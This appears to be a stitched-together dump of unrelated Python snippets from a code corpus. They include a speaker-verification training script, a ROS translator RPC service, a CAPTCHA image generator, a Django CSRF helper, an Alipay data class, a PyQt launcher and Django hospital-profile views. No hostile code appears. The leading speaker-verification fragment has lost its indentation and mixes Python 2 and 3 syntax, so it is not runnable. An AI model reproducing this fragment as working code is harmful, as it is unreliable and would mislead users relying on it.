if AF[i][2]!='': FtrainAF1=np.delete(FtrainAF1,range(AF[i][2][0],AF[i][2][1]),1)
# import pdb;pdb.set_trace(); #for debug
# FtrainAF1=FtrainAF1*AF[i][1]
if AF[i][1]>=0:
FtrainAF1=FtrainAF1*AF[i][1]
else:
for j in range(0,len(FtrainAF1)):
FtrainAF1[j]=FtrainAF1[j]*(-AF[i][1])/np.linalg.norm(FtrainAF1[j])
# FtrainAF1[j]=FtrainAF1[j]*AF[i][1]
# FtrainAF1[i]=FtrainAF1[i]*AF[i][1]/np.linalg.norm(FtrainAF1[i])
# FtrainAF1=np.array(pd.read_csv('{}'.format(AF[i]),delim_whitespace=True,dtype=np.float64,header=None))[:,:-1]
# import pdb;pdb.set_trace(); #for debug
if i==0:
FtrainAF=FtrainAF1
else:
FtrainAF=np.concatenate([FtrainAF,FtrainAF1],axis=1)
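        # Added note: after this loop FtrainAF holds the auxiliary features from every -AF file,
        # concatenated column-wise in the given order; a non-negative weight AF[i][1] scales the whole
        # block, while a negative weight rescales each row to unit L2 norm times |weight| instead.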
#
for i_m,m in enumerate(M):#machine
if args.ow == 1:
mylib.myshell('make data-clean;mkdir -p tmp')
else:
print('#No data-cleaned because -ow 0')
fbtrain='train_xy'
fbtest='test_xy'
fntrain='{}.dat'.format(fbtrain)
fntest='{}.dat'.format(fbtest)
fptrain=open(fntrain,'w')
fptest=open(fntest,'w')
Fall=[]
Ftrain={}
Ftest={}
ytrain=[]
# import pdb;pdb.set_trace(); #for debug
if method[0]=='N':#all oob
for i_r,r in enumerate(R):
for i_v,v in enumerate(V):
Ftrain[(v,r)]=['{}-{}{}-R{}-Fdummy.dat'.format(v,d,l,r) for d in D for l in L]
# import pdb;pdb.set_trace(); #for debug
elif nRX==0:#all oob
for i_r,r in enumerate(R):
for i_v,v in enumerate(V):
fnq='{}/*{}*-R{}*-{}.dat'.format(dr,v,r,FDext) #fnq=args.dir+ '/' + s + '-' + t + l + '*'
# fnq='{}/{}-*R{}*{}.dat'.format(dr,s,r,FDext) #fnq=args.dir+ '/' + s + '-' + t + l + '*'
F=[f.split('/')[-1] for f in glob.glob(fnq)] #file list
if len(F)==0:
                    print('#No files for {}'.format(fnq))
quit()
F.sort()
np.random.seed(seed=32)
Fp=np.random.permutation(F)
# Fp=F
Ftrain[(v,r)]=Fp[:]
# import pdb;pdb.set_trace(); #for debug
if len(F)==0:
print('###########No files with {}'.format(fnq))
import pdb;pdb.set_trace(); #for debug
# import pdb;pdb.set_trace(); #for debug
###############
else:
for i_r,r in enumerate(R):
for i_v,v in enumerate(V):
fnq='{}/*{}*-R{}*'.format(dr,v,r,FDext) #fnq=args.dir+ '/' + s + '-' + t + l + '*'
#fnq='{}/{}-*R{}*'.format(dr,s,r) #fnq=args.dir+ '/' + s + '-' + t + l + '*'
F=[f.split('/')[-1] for f in glob.glob(fnq)] #file list
if len(F)==0:
print('###########No files with {}'.format(fnq))
import pdb;pdb.set_trace(); #for debug
F.sort()
np.random.seed(seed=32)
Fp=np.random.permutation(F)
                Ftrain[(v,r)]=Fp[:len(Fp)//2]
#Ftest[(s,r)]=Fp[:len(Fp)/2]
#Ftest[(s,r)]=Fp[len(Fp)/2:]
for i_r,r in enumerate(RX):
for i_v,v in enumerate(V):
fnq='{}/*{}*-R{}*'.format(dr,v,r,FDext) #fnq=args.dir+ '/' + s + '-' + t + l + '*'
#fnq='{}/{}-*R{}*'.format(dr,s,r) #fnq=args.dir+ '/' + s + '-' + t + l + '*'
F=[f.split('/')[-1] for f in glob.glob(fnq)] #file list
if len(F)==0:
print('###########No files with {}'.format(fnq))
import pdb;pdb.set_trace(); #for debug
F.sort()
np.random.seed(seed=32)
Fp=np.random.permutation(F)
#Ftrain[(s,r)]=Fp[:len(Fp)/2]
#Ftest[(s,r)]=Fp[:len(Fp)/2]
                Ftest[(v,r)]=Fp[len(Fp)//2:]
###############
# import pdb;pdb.set_trace(); #for debug
# for i_m,m in enumerate(M):#machine
nP=0;nF=0
for key in Ftrain.keys():
for i_f,f in enumerate(Ftrain[key]):
# import pdb;pdb.set_trace(); #for debug
v,r,v2=vrv2_f(f)
# s,r,s2=vrv2_f(f)
# import pdb;pdb.set_trace(); #for debug
if v == m:
ytarget=1
nP+=1
else:#s != m
if m!=v2:
ytarget=-1
nF+=1
else:
ytarget=0 #don't train
print('#m{}:{} excludes {} from negative examples.'.format(i_m,m,f));
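            # Added note on the labeling scheme: ytarget=1 when the file's speaker v equals the current
            # machine m, ytarget=-1 when both v and the secondary speaker v2 differ from m, and
            # ytarget=0 (skipped below) when v2 equals m.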
if ytarget !=0:
if method[0]=='MFCC':
# import pdb;pdb.set_trace(); #for debug
x1=np.array(pd.read_csv('{}/{}'.format(dr,f),delim_whitespace=True,dtype=np.float64,header=None))
if E_MFCC==0:
x1=x1[:,:-1]
else:pass
x=x1.mean(axis=0)
# x=np.array(pd.read_csv('{}/{}'.format(dr,f),delim_whitespace=True,dtype=np.float64,header=None))
# if method[0]=='MFCC' and E_MFCC==0:
elif method[0]=='LPCSE1':
# import pdb;pdb.set_trace(); #for debug
# print("check fn={}".format('{}/{}'.format(dr,f)))
x1=np.array(pd.read_csv('{}/{}'.format(dr,f),delim_whitespace=True,dtype=np.float64,header=None))
x=x1.mean(axis=0)
elif method[0]=='N':
# import pdb;pdb.set_trace(); #for debug
x=np.array([1])
else:
x=np.array(pd.read_csv('{}/{}'.format(dr,f),delim_whitespace=True,dtype=np.float64,header=None)).reshape((-1,))
# import pdb;pdb.set_trace(); #for debug
if math.isnan(x[0]):
import pdb;pdb.set_trace(); #for debug
if args.lx[0]=='1':
x=np.log1p(x)
# x=np.log10(0.01+x)
# x=np.log10(x)
normx=1
if args.nlz=='norm':
normx=np.linalg.norm(x)
elif args.nlz=='max':
normx = x.max()
if nx>0:
x = x/normx
if math.isnan(x[0]):
                    print('### Error: nan arises for m={},v={}'.format(m,v));
import pdb;pdb.set_trace(); #for debug
else:
Fall.append(f) #Fall=Fperm??
for i in range(len(x)):
fptrain.write('%e ' % (x[i]))# fptrain.write('%.10e ' % (x[i]))
if fntrain_check==1:
fptrain.write('{} {}\n'.format(ytarget,f))
else:
fptrain.write('{}\n'.format(ytarget))
ytrain.append(ytarget)
n_train=len(Fall)
print('#n_train={},nP={},nF={}'.format(n_train,nP,nF))
fptrain.close()
fptest.close()
# import pdb;pdb.set_trace(); #for debug
# for i_m,m in enumerate(M):#machine
if i_m == 0:
fntrain_m='{}/{}{}'.format(dr,FDext,fntrain) #same x,different y for different m?
cmd='cp {} {}'.format(fntrain,fntrain_m) #
if fntrain_check==1:
fntrain_m='{}/{}{}_{}.dat'.format(dr,FDext,fbtrain,m) #same x,different y for different m
cmd='cp {} {}'.format(fntrain,fntrain_m) #
else:pass
mylib.myshell(cmd)
cmd0='export AF={}/{}{}'.format(args.dr,FDext,fntrain)
cmd=('echo "{}">tmp/AF.env'.format(cmd0))
mylib.myshell(cmd)
print('#Type "source tmp/AF.env"\n# or "{}"'.format(cmd0))
# print('#AF={}/{} #saved in ${}AF{}{} '.format(args.dr,FDext,'{','}',fntrain))
# print('#saved {} as AF={}/{}'.format(fntrain_m,dr,FDext))
# print('#saved {} as AF={}/{}'.format(fntrain_m,dr,FDext))
if args.AF=='q':
if fntrain_check==1:
continue;
else:
exit(0)
else:pass
else:pass
# mylib.myshell('cp {} {}/{}'.format(fntest,dr,fntest))
k=len(x)
if args.AF !='_':
# AF=(args.AF).split(':')
## import pdb;pdb.set_trace(); #for debug
# Ftrain=np.array(pd.read_csv('{}{}.dat'.format(AF[0],fbtrain),delim_whitespace=True,dtype=np.float64,header=None))
# for i in range(0,len(AF)):
# Ftrain1=np.array(pd.read_csv('{}{}.dat'.format(AF[i],fbtrain),delim_whitespace=True,dtype=np.float64,header=None))
# Ftrain=np.concatenate([Ftrain[:,:-1],Ftrain1],axis=1)
# import pdb;pdb.set_trace(); #for debug
# Ftrain1=pd.read_csv(fntrain,delim_whitespace=True,dtype=np.str,header=None) #current real target
Ftrain1=np.array(pd.read_csv(fntrain,delim_whitespace=True,dtype=np.float64,header=None)) #current target (./train_xy.dat)
if method[0]=='N':
Ftrain1=np.delete(Ftrain1,0,1)
# import pdb;pdb.set_trace(); #for debug
Ftrain=np.concatenate([FtrainAF,Ftrain1],axis=1)
df=pd.DataFrame(Ftrain)
df.to_csv('{}'.format(fntrain),index=False,sep=' ',header=None)
k=Ftrain.shape[1]-1
else:pass
# import pdb;pdb.set_trace(); #for debug
# k=Ftrain.shape[1]-1
###trainig and test of oob
cmd='ensrs {} {} {}-{} k:{} ib:0:0:0:0 y:-1:1:-1:1 x:0:0:0:1 DISP:0 nop:1 bg:/dev/null'.format(fntrain,args.mbas,N,N,k)
# cmd='ensrs {}.dat {} {}-{} k:{} ib:0:0:0:0 y:-1:1:-1:1 x:0:0:0:1 DISP:0 nop:1 bg:/dev/null >> ./tmp/ensrs.log'.format(fntrain,args.mbas,args.N,args.N,k)
# sprintf(com,"ensrs %sxy.dat %s %d-%d:1 k:%d ib:0:0:0:0 y:-1:1:-1:1 x:0:0:0:1 DISP:0 bg:/dev/null > /dev/null",fntrain,mbas,N,N,k);
# import pdb;pdb.set_trace(); #for debug
    print('Executing1 {}'.format(cmd))
fnpred='predict+oob.dat' #direct pred
fnoob='pred+oob-{}.dat'.format(m) #oob pred
# import pdb;pdb.set_trace(); #for debug
while True: #??
sys.stdout.flush()
mylib.myshell(cmd)
if os.path.exists(os.path.expanduser(fnpred)):
break
        print('#Try creating {} again!'.format(fnpred))
# time.sleep(1)
mylib.myshell('cp {} {}'.format(fnpred,fnoob)) #oob-output
# sys.stdout.flush()
# mylib.myshell(cmd)
## mylib.myshell('if [ ! -e {} ]; then sleep 2 ; fi ; cp {} {}'.format(fnpred,fnpred,fnoob)) #oob-output
# mylib.myshell('while [ ! -e {} ]; do echo "#Waiting creation of {}."; sleep 1 ; done; cp {} {}'.format(fnpred,fnpred,fnpred,fnoob)) #oob-output
###test with learned
if nRX>0:
cmd='ensrs {} {} {}-{}:1 k:{} ib:0:0:0:0 y:-1:1:-1:1 x:0:0:0:1 DISP:0 bg:{}.dat >> ./tmp/ensrs.log'.format(fntrain,args.mbas,N,N,k,fntest);
        print('#Executing2 {}'.format(cmd))
sys.stdout.flush()
mylib.myshell(cmd)
else:pass
###speaker verification
# import pdb;pdb.set_trace(); #for debug
    yoob3=np.array(pd.read_csv(fnoob,delim_whitespace=True,header=None).iloc[:,0:3]).astype('float64')  # .ix was removed from pandas; iloc[:,0:3] keeps columns 0-2
yoob=yoob3[:,0]
yt=yoob3[:,2]
# yoob=np.array(pd.read_csv(fnoob,delim_whitespace=True,dtype=np.float64,header=None)[0:3])
if nRX>0:#??? if nRX>=0:#???
# import pdb;pdb.set_trace(); #for debug
        ypred=np.array(pd.read_csv(fnpred,delim_whitespace=True,header=None).iloc[:,0]).astype('float64')
yp=np.concatenate([yoob,ypred],axis=0)
else:
yp=yoob
# import pdb;pdb.set_trace(); #for debug
# print "m,Fall=",m,Fall
y=[]
vv=[] #
TP=TN=FP=FN=0;
n_Fall=len(Fall)
for i_f,f in enumerate(Fall):
v,r,v2=vrv2_f(f) # s,r,s2=srs2_f(f)
if m == v or m == v2: #yp should be positive
y.append(1)
if yp[i_f] > 0: #Positive
TP+=1
vv.append('TP')
if yt[i_f] <= 0:
                    print(m,v,r,v2,yoob3[i_f])
                    # import pdb;pdb.set_trace(); #for debug
                    print('TP but FP yt<=0')
else:
FN+=1
vv.append('FN')
print('FN:{} yp={} m={} v={} v2={}'.format(f,yp[i_f],m,v,v2))
if yt[i_f] <=0:
                    print(m,v,r,v2,yoob3[i_f])
                    # import pdb;pdb.set_trace(); #for debug
                    print('FN but TN yt<0')
else: #yp should be Negative
y.append(-1)
if yp[i_f] > 0: #Positive
FP+=1
vv.append('FP')
print('FP:{} yp={} m={} v={} v2={}'.format(f,yp[i_f],m,v,v2))
if yt[i_f] >0:
                    print(m,v,r,v2,yoob3[i_f])
                    # import pdb;pdb.set_trace(); #for debug
                    print('FP but TP yt>0')
else:
TN+=1
vv.append('TN')
if yt[i_f] >0:
                    print(m,v,r,v2,yoob3[i_f])
                    # import pdb;pdb.set_trace(); #for debug
                    print('TN but FN yt>0')
if i_f == n_train-1 or i_f == n_Fall-1:
ER =(FP+FN)
n =(TP+TN+FP+FN)
TPFN=(TP+FN)
FPTN=(FP+TN)
TPR=100.*TP/float(TPFN) if TPFN >0 else 0;
FNR=100.*FN/float(TPFN) if TPFN >0 else 0;
FPR=100.*FP/float(FPTN) if FPTN >0 else 0;
TNR=100.*TN/float(FPTN) if FPTN >0 else 0;
ERR=100.*ER/float(n) if n>0 else 0;
ret='{:.2f} {:.2f} {:.2f} {:.2f} {:.2f} = {} {} {} {} {} {} {} {} {} {} {} #TP,TN,FP,FN,ER=.#n,m,R,RX,mbas,N'.format(TPR,TNR,FPR,FNR,ERR,TP,TN,FP,FN,ER,n,m,args.R,args.RX,args.mbas,N)
if '1' in DISP: print(ret) ##DISP??
# import pdb;pdb.set_trace(); #for debug
if i_f == n_train-1:
fpr.write('{}\n'.format(ret))
elif nRX>0:
fprX.write('{}\n'.format(ret))
TP=TN=FP=FN=0;
# import pdb;pdb.set_trace(); #for debug
fpr.flush()
# import pdb;pdb.set_trace(); #for debug
elapsed_time=time.time()-start_time
etime='{:.2f}s({})'.format(elapsed_time,str(datetime.timedelta(seconds=elapsed_time))[:-3])
print('#elapsed time:{}@{} for m{}:{}'.format(etime,datetime.datetime.now(),i_m,m))
if DISP[2]=='1':
for i_f,f in enumerate(Fall):
print "{} {:+.2f} {} {} {} #yp y f m ytrain={}".format(f,yp[i_f],y[i_f],m,vv[i_f],ytrain[i_f])
sys.stdout.flush()
# import pdb;pdb.set_trace(); #for debug
# sprintf(com,"%.2f %.2f %.2f %.2f %.3e %d %d #TP,TN,FP,FN,ERR,n,sm%d",TP,TN,FP,FN,ER,n,sm,sm);
# fpr.write('#result of cmd="{}"\n'.format(cmd0))
# fpr.write('export #AF={}/{} #saved in ${}AF{}{}\n'.format(args.dr,FDext))
fpr.close()
if nRX>0: fprX.close()
# import pdb;pdb.set_trace(); #for debug
cmd='cat {}|awk \'BEGIN{{n=0;TP=TN=FP=FN=ERR=0}}{{TP+=$7;TN+=$8;FP+=$9;FN+=$10;ERR+=$11;n+=$12;}}END{{RC=TP/(TP+FN);PR=TP/(TP+FP);F=2*RC*PR/(RC+PR);printf("#TP%.2f TN%.2f FP%.2f FN%.2f ER%.2f RC%.2f PR%.2f F%.2f n%d k{} {} {}\\n",100.*TP/(TP+FN),100.*TN/(FP+TN),100.*FP/(FP+TN),100.*FN/(TP+FN),100.*ERR/n,100.*RC,100.*PR,100.*F,n)}}\'>>{}'.format(fnr,k,FDextr,etime,fnr)
# cmd='cat {}|awk \'BEGIN{{n=0;TP=TN=FP=FN=ERR=0}}{{TP+=$7;TN+=$8;FP+=$9;FN+=$10;ERR+=$11;n+=$12;}}END{{RC=TP/(TP+FN);PR=TP/(TP+FP);F=2*RC*PR/(RC+PR);printf("#TP%.3f TN%.3f FP%.3f FN%.3f ER%.3f RC%.3f PR%.3f F%.3f n%d k{} {} {}\\n",TP/(TP+FN),TN/(FP+TN),FP/(FP+TN),FN/(TP+FN),ERR/n,RC,PR,F,n)}}\'>>{}'.format(fnr,k,FDextr,etime,fnr)
# cmd='cat {}|awk \'BEGIN{{n=0;TP=TN=FP=FN=ERR=0}}{{TP+=$7;TN+=$8;FP+=$9;FN+=$10;ERR+=$11;n+=$12;}}END{{RC=TP/(TP+FN);PR=TP/(TP+FP);F=2*RC*PR/(RC+PR);printf("#TP%.3f TN%.3f FP%.3f FN%.3f ER%.3f RC%.3f PR%.3f F%.3f n%d k{} {}lx{}sd{} {}\\n",TP/(TP+FN),TN/(FP+TN),FP/(FP+TN),FN/(TP+FN),ERR/n,RC,PR,F,n)}}\'>>{}'.format(fnr,k,FDextr,args.lx,args.sd,etime,fnr)
#
# cmd='cat {}'.format(fnr)+'|awk \'BEGIN{n=0;TP=TN=FP=FN=ERR=0}{n+=$13;TP+=$7;TN+=$8;FP+=$9;FN+=$10;ERR+=$11}END{RC=TP/(TP+FN);PR=TP/(TP+FP);F=2*RC*PR/(RC+PR);printf("#TP%.3f TN%.3f FP%.3f FN%.3f ER%.3f RC%.3f PR%.3f F%.3f '+'k{} {} {}\\n"'.format(k,FD[0],etime)+',TP/(TP+FN),TN/(FP+TN),FP/(FP+TN),FN/(TP+FN),ERR/n,RC,PR,F)}\''+ '>>{}'.format(fnr)
# cmd='cat {}'.format(fnr)
# +"|awk 'BEGIN{n=0;TP=TN=FP=FN=ERR=0}{n+=$13;TP+=$7;TN+=$8;FP+=$9;FN+=$10;ERR+=$11}END{RC=TP/(TP+FN);PR=TP/(TP+FP);F=2*RC*PR/(RC+PR);"
# +'printf("#TP%.3f TN%.3f FP%.3f FN%.3f ER%.3f RC%.3f PR%.3f F%.3f '
# +'k{} {} {}\\n"'.format(k,FD[0],etime)
# +",TP/(TP+FN),TN/(FP+TN),FP/(FP+TN),FN/(TP+FN),ERR/n,RC,PR,F)}'"
# + '>>{}'.format(fnr)
#
# cmd='cat {}|awk \''.format(fnr)
# +'BEGIN{n=0;TP=TN=FP=FN=ERR=0}{n+=$13;TP+=$7;TN+=$8;FP+=$9;FN+=$10;ERR+=$11}END{RC=TP/(TP+FN);PR=TP/(TP+FP);F=2*RC*PR/(RC+PR);printf("#TP%.3f TN%.3f FP%.3f FN%.3f ER%.3f RC%.3f PR%.3f F%.3f'
# +'k{} {} {}\\n",TP/(TP+FN),TN/(FP+TN),FP/(FP+TN),FN/(TP+FN),ERR/n,RC,PR,F)}'.format(k,FD[0],etime)
# +"'>>{}'.format(fnr)
#
# cmd='cat {}'.format(fnr)+'|awk \'BEGIN{n=0;TP=TN=FP=FN=ERR=0}{n+=$13;TP+=$7;TN+=$8;FP+=$9;FN+=$10;ERR+=$11}END{RC=TP/(TP+FN);PR=TP/(TP+FP);F=2*RC*PR/(RC+PR);printf("%.3f %.3f %.3f %.3f %.3f %.3f %.3f %.3f #TP TN FP FN ER RC PR F#'+' k{} FD:{} {}\\n"'.format(k,args.FD,etime)+',TP/n,TN/n,FP/n,FN/n,ERR/n,RC,PR,F)}\''+ '>>{}'.format(fnr)
# print cmd
mylib.myshell(cmd)
# cmd='cat {} #oob prediction of training data k{} {} {}'.format(fnr,k,args.FD,etime)
mylib.myshell('echo "python {}" >> {}'.format(cmd0,fnr))
mylib.myshell('echo "export AF={}/{}{}" >> {}'.format(args.dr,FDext,fntrain,fnr))
# mylib.myshell('echo "#export AF={}/{} #saved in \${}AF{}{}" >> {}\n'.format(args.dr,FDext,'{','}',fntrain,fnr))
cmd='cat {}'.format(fnr)
mylib.myshell(cmd)
print('\n#Do "cat {}"\nto see the result'.format(fnr))
if nRX>0:
    cmd='cat {}'.format(fnrX)+'|awk \'BEGIN{n=0;TP=TN=FP=FN=ERR=0}{n++;TP+=$1;TN+=$2;FP+=$3;FN+=$4;ERR+=$5}END{printf("%.2f %.2f %.2f %.2f %.2f %d #mean TP TN FP FN ERR n'+' k{} {}sd{} {}\\n"'.format(k,FDextr,args.sd,etime)+',TP/n,TN/n,FP/n,FN/n,ERR/n,n)}\''+ '>>{}'.format(fnrX)
mylib.myshell(cmd)
cmd='cat {} #prediction of test data'.format(fnrX)
    print(cmd)
mylib.myshell(cmd)
# print('#result of cmd0="{}"\n'.format(cmd0))
|
StarcoderdataPython
|
1732822
|
<gh_stars>0
# ROS
import roslibpy
# Tranlate functions
from .translate_functions import *
# Python
import sys
import time
import json
import math
import socket
# IS
from is_wire.core import Channel, Message, Logger, Status, StatusCode
from .is_ros_pb2 import ROSTranslateRequest, ROSTranslateReply
from is_wire.rpc import ServiceProvider, LogInterceptor
from google.protobuf.any_pb2 import Any
def get_obj(callable, obj):
value = callable()
if value is not None:
obj.CopyFrom(value)
def get_val(callable, obj, attr):
value = callable()
if value is not None:
setattr(obj, attr, value)
def get_class( kls ):
kls = kls.replace('is', 'is_msgs')
kls = kls.replace('camera', 'camera_pb2')
kls = kls.replace('common', 'common_pb2')
kls = kls.replace('image', 'image_pb2')
kls = kls.replace('power', 'power_pb2')
kls = kls.replace('robot', 'robot_pb2')
kls = kls.replace('tests', 'tests_pb2')
kls = kls.replace('validate', 'validate_pb2')
parts = kls.split('.')
module = ".".join(parts[:-1])
m = __import__( module )
for comp in parts[1:]:
m = getattr(m, comp)
return m
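# Illustrative example (added comment; the concrete message name is hypothetical):
#   get_class('is.robot.RobotConfig')  ->  resolves to is_msgs.robot_pb2.RobotConfig
# i.e. the string replacements above rewrite the package path before the module is imported.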
class ROSTranslator(object):
def __init__(self, robot_config, correspondence_dict):
self.logger = Logger("ROSTranslator")
self.robot_id = robot_config['robot_id']
self.robot_ip = robot_config['robot_ip']
self.robot_port = robot_config['robot_port']
self.correspondence = correspondence_dict
self.ros = roslibpy.Ros(host=str(self.robot_ip), port=int(self.robot_port))
self.ros.run()
# -=-=-=-=-=-=-=-=-=-=-= ROS TOPICS, SERVICES ... =-=-=-=-=-=-=-=-=-=-=-=-
def ros_topic_publisher(self, ros_topic, message_type, message_json):
publisher = roslibpy.Topic(self.ros, ros_topic, message_type, queue_size=10, latch=True)
for i in range(1,11):
publisher.publish(roslibpy.Message(message_json))
publisher.unadvertise()
def ros_topic_subscriber(self, ros_topic, message_type):
self.listener = roslibpy.Topic(self.ros, ros_topic, message_type)
self.listener.subscribe(lambda message: self.subscriber_callback(message))
while self.listener.is_subscribed: time.sleep(1)
return self.subscriber_data # return json
def subscriber_callback(self, message):
self.subscriber_data = message
self.listener.unsubscribe()
def ros_topic_list(self):
return self.ros.get_topics()
def ros_topic_msg_type(self, ros_topic):
return self.ros.get_topic_type(ros_topic)
def ros_service(self, ros_service, message_type, message_json=None):
service = roslibpy.Service(self.ros, ros_service, message_type)
request = roslibpy.ServiceRequest(message_json)
result = service.call(request)
# -=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
def get_info(self, translate_request, ctx):
translate_reply = ROSTranslateReply()
if translate_request.topic == '':
translate_reply.data = str(self.ros_topic_list())
return translate_reply
msg_type = self.ros.get_topic_type(translate_request.topic) # return string
translate_reply.data = str(self.ros_topic_subscriber(translate_request.topic, msg_type))
return translate_reply
def translate(self, translate_request, ctx):
if translate_request.topic == '':
topics = self.ros_topic_list()
return Status(StatusCode.CANCELLED,
why='No topic received. List of available topics: {}'.format(topics))
is_msg_type_class = get_class(translate_request.any.type_url.split('/')[-1])
is_msg = is_msg_type_class()
translate_request.any.Unpack(is_msg)
if translate_request.function == '':
method_name = self.correspondence[translate_request.any.type_url.split('/')[-1].split('.')[-1]]
else:
method_name = translate_request.function
funcs = globals().copy()
funcs.update(locals())
method = funcs.get(method_name)
if not method:
raise NotImplementedError("Method/Function %s not implemented" % method_name)
        # 'method' is already the callable looked up by name; call it directly
        maybe_ok = method(self, translate_request)
if maybe_ok != Status(StatusCode.OK):
return maybe_ok
return Status(StatusCode.OK)
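    # Dispatch summary (added comment): translate() unpacks the protobuf Any into its is-msgs type,
    # chooses a translate function either from the explicit 'function' field or by looking up the
    # message type name in the correspondence dict, then calls it with this translator and the
    # request and returns whatever Status the function produces.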
def run(self,broker_uri):
service_name = "ROSTranslator.{}".format(self.robot_id)
publish_channel = Channel(broker_uri)
rpc_channel = Channel(broker_uri)
server = ServiceProvider(rpc_channel)
logging = LogInterceptor()
server.add_interceptor(logging)
server.delegate(
topic=service_name + ".GetInfo",
request_type=ROSTranslateRequest,
reply_type=ROSTranslateReply,
function=self.get_info)
server.delegate(
topic=service_name + ".Translate",
request_type=ROSTranslateRequest,
reply_type=ROSTranslateReply,
function=self.translate)
self.logger.info("RPC listening for requests")
while True:
try:
message = rpc_channel.consume(timeout=0)
if server.should_serve(message):
server.serve(message)
except socket.timeout:
pass
        # rospy.spin()  # unreachable after the while-True loop above; rospy is never imported (roslibpy is used instead)
|
StarcoderdataPython
|
40613
|
import PIL.Image,PIL.ImageDraw,PIL.ImageFont,PIL.ImageFilter
import random
#Random uppercase letter (A-Z)
def rndchar():
return chr(random.randint(65, 90))
#random.randint(65, 90) picks a random integer between 65 and 90; in ASCII this range corresponds to the uppercase letters A-Z
#chr(kk) takes an integer ASCII code kk and returns the corresponding character
#Random color 1 (light tones, used for the background pixels)
def rndcolor():
return random.randint(64, 255),random.randint(64, 255),random.randint(64, 255)
#Random color 2 (darker tones, used for the text)
def rndcolor2():
return random.randint(32, 127), random.randint(32, 127), random.randint(32, 127)
width = 60*4
height = 60
image = PIL.Image.new('RGB', (width, height), (255, 255, 255))
#RGB mode: colors are produced by varying and mixing the red (R), green (G) and blue (B) channels
#Create the font object
font = PIL.ImageFont.truetype('fonts.ttf', 36)
#Load a TrueType/OpenType font file and create a font object at the requested size; the path should point to a font file available on the system
#Create the draw object
draw = PIL.ImageDraw.Draw(image)
#Fill every pixel with a random light color
for x in range(width):
for y in range(height):
draw.point((x, y), fill=rndcolor())
#Draw four random characters
for t in range(4):
draw.text((60*t+10, 10), rndchar(), font=font, fill=rndcolor2())
image = image.filter(PIL.ImageFilter.BLUR)
image.save('test2.png')
|
StarcoderdataPython
|
3387128
|
from django.core import context_processors
from django.utils import encoding, functional, html
def csrf(request):
# Django does it lazy like this. I don't know why.
def _get_val():
token = context_processors.csrf(request)['csrf_token']
# This should be an md5 string so any broken Unicode is an attacker.
try:
return html.escape(unicode(token))
except UnicodeDecodeError:
return ''
return {'csrf_token': functional.lazy(_get_val, unicode)()}
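# Usage sketch (added note, assuming a standard Django project layout): register this processor in
# settings.py so templates receive the lazily-escaped {{ csrf_token }} value, e.g.
#
#   TEMPLATES = [{
#       'BACKEND': 'django.template.backends.django.DjangoTemplates',
#       'OPTIONS': {'context_processors': ['myapp.context_processors.csrf']},
#   }]
#
# The dotted path 'myapp.context_processors.csrf' is hypothetical and only illustrates where this
# module's csrf() function would be referenced.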
|
StarcoderdataPython
|
1619353
|
<reponame>rafaellehmkuhl/OpenCV-Python-GUI<filename>main.py
if __name__ == '__main__':
import sys
from PyQt5.QtWidgets import QApplication
from CvPyGui import Main
app = QApplication(sys.argv)
window = Main.MyApp()
window.show()
sys.exit(app.exec_())
|
StarcoderdataPython
|
3375493
|
<gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class ActivityMerchantOrder(object):
def __init__(self):
self._activity_type = None
self._audit_result = None
self._fail_reason = None
self._order_id = None
self._rate = None
@property
def activity_type(self):
return self._activity_type
@activity_type.setter
def activity_type(self, value):
self._activity_type = value
@property
def audit_result(self):
return self._audit_result
@audit_result.setter
def audit_result(self, value):
self._audit_result = value
@property
def fail_reason(self):
return self._fail_reason
@fail_reason.setter
def fail_reason(self, value):
self._fail_reason = value
@property
def order_id(self):
return self._order_id
@order_id.setter
def order_id(self, value):
self._order_id = value
@property
def rate(self):
return self._rate
@rate.setter
def rate(self, value):
self._rate = value
def to_alipay_dict(self):
params = dict()
if self.activity_type:
if hasattr(self.activity_type, 'to_alipay_dict'):
params['activity_type'] = self.activity_type.to_alipay_dict()
else:
params['activity_type'] = self.activity_type
if self.audit_result:
if hasattr(self.audit_result, 'to_alipay_dict'):
params['audit_result'] = self.audit_result.to_alipay_dict()
else:
params['audit_result'] = self.audit_result
if self.fail_reason:
if hasattr(self.fail_reason, 'to_alipay_dict'):
params['fail_reason'] = self.fail_reason.to_alipay_dict()
else:
params['fail_reason'] = self.fail_reason
if self.order_id:
if hasattr(self.order_id, 'to_alipay_dict'):
params['order_id'] = self.order_id.to_alipay_dict()
else:
params['order_id'] = self.order_id
if self.rate:
if hasattr(self.rate, 'to_alipay_dict'):
params['rate'] = self.rate.to_alipay_dict()
else:
params['rate'] = self.rate
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = ActivityMerchantOrder()
if 'activity_type' in d:
o.activity_type = d['activity_type']
if 'audit_result' in d:
o.audit_result = d['audit_result']
if 'fail_reason' in d:
o.fail_reason = d['fail_reason']
if 'order_id' in d:
o.order_id = d['order_id']
if 'rate' in d:
o.rate = d['rate']
return o
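# Round-trip sketch (added example; the field values below are invented for illustration):
#   o = ActivityMerchantOrder.from_alipay_dict({'order_id': '2021123100001', 'rate': '0.6'})
#   o.to_alipay_dict()  ->  {'order_id': '2021123100001', 'rate': '0.6'}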
|
StarcoderdataPython
|
1722549
|
from django.contrib.auth.decorators import login_required
from django.contrib.auth.forms import AdminPasswordChangeForm, PasswordChangeForm, UserCreationForm
from django.contrib.auth import update_session_auth_hash, authenticate, login
from django.contrib import messages
from django.contrib.auth.models import User
from django.core.mail import send_mail
from django.utils.html import strip_tags
from django.contrib.sites.shortcuts import get_current_site
from django.http import JsonResponse
from django.shortcuts import render, redirect
from django.template.loader import render_to_string
from django.utils.encoding import force_bytes, force_text
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.views import View
from social_django.models import UserSocialAuth
from hospital.models import Doctor, Appointment, Hospital
from hospital.views import HospitalsAll
from hospital.forms import InviteDocForm
from landing.models import Region, City, Profile
from landing.tokens import account_activation_token
from .forms import ProfileForm, UsernameForm, SignUpForm, HospitalForm
from medtour import settings
from landing.utils import sg_mail
def land(request):
return render(request, 'landing/base.html')
class CompleteHospitalProfile(View):
def get(self, request):
form = HospitalForm(instance=request.user.hospital)
return render(request, 'landing/hospital_profile_complete.html', {'form': form})
def post(self, request):
form = HospitalForm(request.POST, instance=request.user.hospital)
if form.is_valid():
form.save()
messages.success(request, 'Your profile was successfully updated!')
return redirect('home')
else:
messages.error(
request, 'Slug is already taken, please try another one.')
